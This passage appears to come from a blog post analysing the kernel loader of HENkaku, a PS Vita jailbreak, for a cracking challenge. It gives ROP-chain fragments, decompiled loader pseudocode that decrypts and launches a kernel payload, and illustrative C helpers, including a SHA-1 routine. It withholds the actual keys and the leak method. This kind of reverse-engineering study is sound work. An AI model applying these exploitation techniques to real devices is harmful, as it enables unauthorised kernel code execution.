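    return memblock_addr + ((uint32_t)0x90u << 2);
}

/* EOR with 0x40 flips bit 6, turning +0x240 into +0x200 and back
 * (as long as bit 6 of memblock_addr itself is clear). */
uint32_t rop_toggle_bit6(uint32_t value) {
    return value ^ 0x40u;
}

/* Subtracting 0xFFFFFFF0 modulo 2^32 is the same as adding 0x10. */
uint32_t rop_sub_neg16(uint32_t addr) {
    return addr - 0xFFFFFFF0u;
}
```

With a made-up block address of 0x01000000, `rop_keybuf_addr` gives 0x01000240 and `rop_sub_neg16` gives 0x01000010, which is how the chain reaches `memblock_addr + 0x10` without ever holding the constant 0x10 as an addend.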

If you recall, the kernel loader was an encrypted chunk of 0x100 bytes that was appended to the bottom of the ROP chain we copy into a kernel stack using sceIoDevctl:
// NULLs for padding at the bottom of the chain
0x00(x_stack + 0x00008D7C) = 0x00000000;
0x00(x_stack + 0x00008D80) = 0x00000000;
0x00(x_stack + 0x00008D84) = 0x00000000;

// Code starts here
0x00(x_stack + 0x00008D88) = ...;

The kernel ROP decrypts this chunk using AES-256-ECB and the key is a piece of code from SceSysmem itself.
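
The key pointer `scesysmem_base + 0x39EB + 0x02` follows from how Thumb calls behave: gadget addresses in the chain have bit 0 set to select Thumb state, `BLX R3` is a 2-byte instruction, and `BLX` leaves the address of the following instruction (with bit 0 set again) in LR, which the chain then moves into R3. A minimal sketch of that calculation, with a helper name that is my own:

```c
#include <stdint.h>

/* Value left in LR by a 16-bit Thumb "BLX Rm" reached through gadget_ptr. */
uint32_t thumb_blx_return_addr(uint32_t gadget_ptr) {
    uint32_t insn_addr = gadget_ptr & ~(uint32_t)1u; /* strip the Thumb bit */
    uint32_t next_insn = insn_addr + 2u;             /* BLX Rm is 2 bytes */
    return next_insn | 1u;                           /* Thumb bit set again */
}
```

For the gadget offset 0x39EB this yields 0x39ED, so the 32 bytes used as the AES-256 key are read starting from that (odd) address inside SceSysmem.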
This is what the kernel loader looks like (note that base offset is set to 0x00000000):

// Entry point
sub_00000010(scesysmem_base, payload_addr)
r4 = scesysmem_base
r5 = scesysmem_base >> 0x20
// Decrypt and launch HENkaku's payload
sub_00000020(scesysmem_base, payload_addr);
// Decrypt and launch HENkaku's payload
sub_00000020(scesysmem_base, payload_addr)
sp = (sp - 0x1C)
r4 = 0
r8 = sp + 0x18
r7 = scesysmem_base + 0xA500
r5 = scesysmem_base
r7 = scesysmem_base + 0xA521
0x0F(sp) = 0
r11 = payload_addr
r6 = scesysmem_base + 0x1F00
r9 = scesysmem_base + 0x23000
r10 = scesysmem_base + 0x1BA00
r1 = 0x1020D006
r2 = 0xB000
r3 = 0
r0 = sp + 0x18
// Allocate memblock1
r0 = kern_memblock_alloc(sp + 0x18, 0x1020D006, 0xB000, 0);
r2 = 0xB000
r3 = 0
0x04(sp) = r0 // memblock1_id
r0 = sp + 0x18
r1 = 0x1020D005
r6 = scesysmem_base + 0x1F15 // sub_A61F14
// Allocate memblock2
r0 = kern_memblock_alloc(sp + 0x18, 0x1020D005, 0xB000, 0);
r12 = 0x04(sp) // memblock1_id
r7 = r0 // memblock2_id
r1 = sp + 0x10
r9 = scesysmem_base + 0x23095
r10 = scesysmem_base + 0x1BAF5
r0 = memblock1_id
// Get memblock1's address
r0 = kern_memblock_getaddr(memblock1_id, sp + 0x10);
r0 = memblock2_id
r1 = sp + 0x14
// Get memblock2's address
r0 = kern_memblock_getaddr(memblock2_id, sp + 0x14);
r3 = scesysmem_base + 0x8200
r0 = 0x10(sp) // memblock1_addr
r3 = scesysmem_base + 0x825D
r1 = payload_addr
r2 = 0xA000
r7 = scesysmem_base + 0x1D800
// Call copy_from_user to read the HENkaku's payload
// into our new memory block
copy_from_user(memblock1_addr, payload_addr, 0xA000);
r6 = 0x10(sp) // memblock1_addr
r1 = 0x80
r3 = 0x40
r7 = scesysmem_base + 0x1D8D9
r2 = 0x80
r6 = memblock1_addr + 0xA000
r0 = memblock1_addr + 0xA000
r3 = payload_key
// Set the HENkaku's payload key (AES-128-ECB)
AES_setkey(memblock1_addr + 0xA000, 0x80, 0x80, payload_key, 0);
while (r4 != 0xA000)
    r1 = 0x10(sp) // memblock1_addr
    r0 = memblock1_addr + 0xA000
    r1 = memblock1_addr + r4
    r4 = r4 + 0x10
    r2 = memblock1_addr + r4
    // Decrypt the payload in place
    AES_decrypt(memblock1_addr + 0xA000, memblock1_addr + r4, memblock1_addr + r4);
r0 = 0x14(sp) // memblock2_addr
r2 = 0xB000
r1 = 0x10(sp) // memblock1_addr
// Copy from data memory block to executable memory block
kern_memcpy(memblock2_addr, memblock1_addr, 0xB000);
r3 = 0x14(sp) // memblock2_addr
r2 = 0x10(sp) // memblock1_addr
r3 = memblock2_addr + 0x01
r2 = memblock1_addr + 0xAF00
// Set PC
r4 = memblock2_addr + 0x01 // payload()
// Set SP
sp = memblock1_addr + 0xAF00
r0 = scesysmem_base
// Call payload
sp = (sp + 0x1C)

In sum, the loader allocates two memory blocks, one for data and another for code. Then it fetches HENkaku's payload from user memory (using copy_from_user) and decrypts it in place using a static key (stored inside the kernel loader's binary data). Finally, it copies the decrypted payload into an executable memory block, sets PC and SP, and jumps to it.
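
The decrypt-and-copy sequence can be sketched in C as follows. This is only an illustration: `toy_decrypt_block` is a stand-in XOR transform, not AES and not HENkaku's cipher code, and every function and macro name here is hypothetical. What it mirrors from the listing is the 0x10-byte stride over 0xA000 bytes, the in-place decryption, the 0xB000-byte copy into the second block, and the `+ 0x01` on the entry address (which selects Thumb state).

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PAYLOAD_SIZE 0xA000u  /* bytes fetched with copy_from_user */
#define BLOCK_SIZE   0x10u    /* one AES block */
#define COPY_SIZE    0xB000u  /* bytes copied to the executable block */

/* Stand-in for AES_decrypt: XORs one block with a 16-byte key (NOT AES). */
static void toy_decrypt_block(const uint8_t key[BLOCK_SIZE],
                              const uint8_t *in, uint8_t *out) {
    for (size_t i = 0; i < BLOCK_SIZE; i++)
        out[i] = in[i] ^ key[i];
}

/* Decrypts the payload in place, one block at a time; returns block count. */
size_t decrypt_in_place(uint8_t *data, const uint8_t key[BLOCK_SIZE]) {
    size_t blocks = 0;
    for (size_t off = 0; off != PAYLOAD_SIZE; off += BLOCK_SIZE) {
        toy_decrypt_block(key, data + off, data + off);
        blocks++;
    }
    return blocks;
}

/* Copies the data block to the code block; returns the Thumb entry pointer. */
uintptr_t stage_payload(uint8_t *code_block, const uint8_t *data_block) {
    memcpy(code_block, data_block, COPY_SIZE);
    return (uintptr_t)code_block + 1u;
}
```

The loop runs 0xA00 times (0xA000 / 0x10). Because each ECB block is processed independently, using the same buffer for input and output is safe.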

Now we have HENkaku running on our system!
As proof, here are the SHA-1 hashes of the two crucial keys for the entire process:
Kernel loader key (AES-256-ECB): f1a8e9415bf3551377a36a1a5b25ba64f2d96494
Kernel payload key (AES-128-ECB): eacac4a780065c8c106349e412696aabd1b1b8d1
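
Anyone who recovers the keys independently can compare them against these digests. The sketch below is a compact SHA-1 written just for that check (a vetted crypto library would be the better choice in practice); `sha1` and `sha1_matches_hex` are names I picked here and have nothing to do with HENkaku's code.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static uint32_t rotl32(uint32_t x, unsigned n) {
    return (x << n) | (x >> (32 - n));
}

/* Processes one 64-byte block into the running state h[5]. */
static void sha1_block(uint32_t h[5], const uint8_t *p) {
    uint32_t w[80];
    for (int i = 0; i < 16; i++)
        w[i] = ((uint32_t)p[4*i] << 24) | ((uint32_t)p[4*i+1] << 16) |
               ((uint32_t)p[4*i+2] << 8) | (uint32_t)p[4*i+3];
    for (int i = 16; i < 80; i++)
        w[i] = rotl32(w[i-3] ^ w[i-8] ^ w[i-14] ^ w[i-16], 1);

    uint32_t a = h[0], b = h[1], c = h[2], d = h[3], e = h[4];
    for (int i = 0; i < 80; i++) {
        uint32_t f, k;
        if (i < 20)      { f = (b & c) | (~b & d);          k = 0x5A827999u; }
        else if (i < 40) { f = b ^ c ^ d;                   k = 0x6ED9EBA1u; }
        else if (i < 60) { f = (b & c) | (b & d) | (c & d); k = 0x8F1BBCDCu; }
        else             { f = b ^ c ^ d;                   k = 0xCA62C1D6u; }
        uint32_t t = rotl32(a, 5) + f + e + k + w[i];
        e = d; d = c; c = rotl32(b, 30); b = a; a = t;
    }
    h[0] += a; h[1] += b; h[2] += c; h[3] += d; h[4] += e;
}

/* Computes SHA-1 of msg[0..len) into out[20]. msg must be a valid pointer. */
void sha1(const uint8_t *msg, size_t len, uint8_t out[20]) {
    uint32_t h[5] = {0x67452301u, 0xEFCDAB89u, 0x98BADCFEu,
                     0x10325476u, 0xC3D2E1F0u};
    size_t full = len / 64;
    for (size_t i = 0; i < full; i++)
        sha1_block(h, msg + 64 * i);

    /* Tail: remaining bytes, 0x80, zero padding, 64-bit big-endian bit length. */
    uint8_t tail[128] = {0};
    size_t rem = len % 64;
    memcpy(tail, msg + 64 * full, rem);
    tail[rem] = 0x80;
    size_t tail_len = (rem < 56) ? 64 : 128;
    uint64_t bits = (uint64_t)len * 8;
    for (int i = 0; i < 8; i++)
        tail[tail_len - 1 - i] = (uint8_t)(bits >> (8 * i));
    sha1_block(h, tail);
    if (tail_len == 128)
        sha1_block(h, tail + 64);

    for (int i = 0; i < 5; i++) {
        out[4*i]   = (uint8_t)(h[i] >> 24);
        out[4*i+1] = (uint8_t)(h[i] >> 16);
        out[4*i+2] = (uint8_t)(h[i] >> 8);
        out[4*i+3] = (uint8_t)h[i];
    }
}

/* Returns 1 if SHA-1(data) equals the 40-character lowercase hex digest. */
int sha1_matches_hex(const uint8_t *data, size_t len, const char *hex) {
    uint8_t digest[20];
    char text[41];
    sha1(data, len, digest);
    for (int i = 0; i < 20; i++)
        snprintf(text + 2 * i, 3, "%02x", digest[i]);
    return strcmp(text, hex) == 0;
}
```

Assuming the digests were taken over the raw key bytes, a candidate 32-byte loader key held in `key` could be checked with `sha1_matches_hex(key, 32, "f1a8e9415bf3551377a36a1a5b25ba64f2d96494")`, and a 16-byte payload key against the second digest in the same way.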

And that's it! This concludes the final stage of HENkaku's KOTH challenge.
I don't plan on delving into how I leaked the kernel's memory, nor on releasing the keys themselves, out of respect for other groups attempting to complete the challenge and for the developers themselves.
I believe the goal of this challenge was not to simply crown the first person to crack HENkaku, but to get the whole community engaged and bringing new ideas to the table.
By not releasing the decrypted binaries or the method I used to leak memory, others still have the chance to solve the challenge themselves.
I may publish a few more posts detailing some interesting features of HENkaku's payload, but I will leave the full source code reveal to the developers themselves.

Until next time!


